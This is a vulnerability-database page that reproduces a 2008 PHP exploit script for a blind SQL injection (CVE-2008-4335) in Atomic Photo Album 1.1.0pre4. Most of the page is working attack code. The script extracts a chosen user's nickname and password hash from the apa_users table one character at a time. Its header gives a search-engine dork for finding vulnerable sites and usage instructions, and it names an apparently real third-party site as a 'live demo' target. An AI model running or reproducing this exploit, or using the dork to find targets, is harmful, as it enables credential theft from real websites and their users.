Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Atomic Photo Album 1.1.0pre4 - Blind SQL Injection

Related Vulnerabilities: CVE-2008-4335  
Publish Date: 26 Sep 2008
Author: Stack
Source / Download Exploit 
                							

                <?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#      Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit   
#                                                           
#      Vulnerability discovered by: Stack     
#      Exploit coded by:            Stack
#      Greetz to:                   All My Freind
#
###############################################################
#                                                           
#      Dork:        intext:"Powered by Atomic Photo Album 1.1.0pre4"
#      Admin Panel: [Target]/apa/
#      Usage:       php '.$argv[0].' [Target] [Userid]
#      Example for http://www.site.com/apa/lalbum.php?apa_album_ID=[Real id] 2
#      => php '.$argv[0].' http://www.site.com/apa/album.php?apa_album_ID=2 2
#  Live Demo :
#       http://www.brzi.info/foto/album.php?apa_album_ID=2 1
#                                                           
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < 3) {
$userid = 1;
} else {
$userid = $argv[2];
}
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "\nNickname: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+nickname+from+apa_users+where+id=".$userid."+limit+0,1),".$i.",1))!=0"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+nickname+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i.""));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+nickname+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 32; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i.""));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
} else {
echo "\nExploiting failed: By Stack\n";
}
?>

# milw0rm.com [2008-09-26]

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started